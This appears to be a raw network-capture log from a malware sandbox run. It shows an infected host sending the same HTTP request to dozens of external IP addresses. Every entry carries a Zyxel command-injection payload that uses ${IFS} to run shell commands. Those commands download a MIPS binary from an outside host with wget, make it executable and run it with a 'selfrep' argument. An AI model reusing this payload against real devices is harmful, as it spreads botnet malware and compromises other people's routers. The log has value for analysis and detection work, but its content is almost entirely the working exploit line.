                                      Jan 14, 2024 15:50:56.530312061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6976192.168.2.1443230142.92.81.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530333996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6977192.168.2.145531818.159.207.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530359030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6978192.168.2.145632282.80.143.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530396938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6979192.168.2.1450348177.20.103.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530446053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6980192.168.2.144863257.172.168.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530483007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6981192.168.2.144661262.213.136.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530510902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6982192.168.2.145375661.247.187.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530572891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6983192.168.2.145505631.218.215.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530597925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6984192.168.2.1446326192.255.96.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530631065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6985192.168.2.143686853.44.167.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530658960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6986192.168.2.146053653.4.105.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530697107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6987192.168.2.1446594102.52.242.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530729055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6988192.168.2.1444238123.6.16.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530756950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6989192.168.2.1456718129.29.25.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530786037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6990192.168.2.144913494.90.189.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530848026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6991192.168.2.1458476147.24.172.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530885935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6992192.168.2.1455092222.230.151.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530920982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6993192.168.2.1458698136.45.163.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530951977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6994192.168.2.145023436.232.82.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530978918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6995192.168.2.1434980210.236.233.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531039953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6996192.168.2.1438008193.121.47.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531116962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6997192.168.2.1440276152.84.248.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531153917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6998192.168.2.1442088208.115.219.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531188965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6999192.168.2.1458040118.156.231.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531244993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7000192.168.2.1439768135.168.207.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531291008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7001192.168.2.145035635.22.36.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531338930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7002192.168.2.1448064195.191.228.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531390905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7003192.168.2.1434998222.149.249.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531397104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7004192.168.2.1453710222.5.73.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531444073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7005192.168.2.1442184197.77.212.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531498909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7006192.168.2.1437814157.173.139.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531538963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7007192.168.2.143327057.167.125.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531568050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7008192.168.2.1456822107.207.181.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531625032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7009192.168.2.1432860126.90.209.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531666994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7010192.168.2.143611012.166.189.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531708002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7011192.168.2.145258681.1.87.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531738043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7012192.168.2.143681853.22.224.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531784058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7013192.168.2.1447134185.190.245.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531815052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7014192.168.2.145329670.184.180.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531847954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7015192.168.2.1441568138.160.165.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531889915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7016192.168.2.143399018.140.160.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531929016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7017192.168.2.1434298158.132.219.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.531960011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7018192.168.2.1436810109.118.2.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.532028913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7019192.168.2.1442398175.121.107.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.532056093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7020192.168.2.1455604150.210.100.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.532089949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7021192.168.2.14541365.151.241.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.532118082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7022192.168.2.1435946197.133.1.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.532176971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7023192.168.2.144675077.42.153.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.532201052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7024192.168.2.1454416153.7.121.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.532243967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7025192.168.2.144315827.181.163.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.535465956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7026192.168.2.145755612.239.234.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.536539078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7027192.168.2.1452230134.223.237.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.536566019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7028192.168.2.1436502179.29.161.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.536637068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7029192.168.2.144357682.232.145.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.536662102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7030192.168.2.143379897.73.116.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.536715984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7031192.168.2.144392865.83.50.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.536748886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7032192.168.2.144031213.48.196.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.536799908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7033192.168.2.143491281.118.169.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.536823034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7034192.168.2.1453318178.150.36.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.536878109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7035192.168.2.144168897.115.30.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.536911964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7036192.168.2.1447518133.114.230.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.536947012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7037192.168.2.145284654.185.49.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.536999941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7038192.168.2.1447910207.175.42.141443
                                      TimestampBytes transferredDirectionData
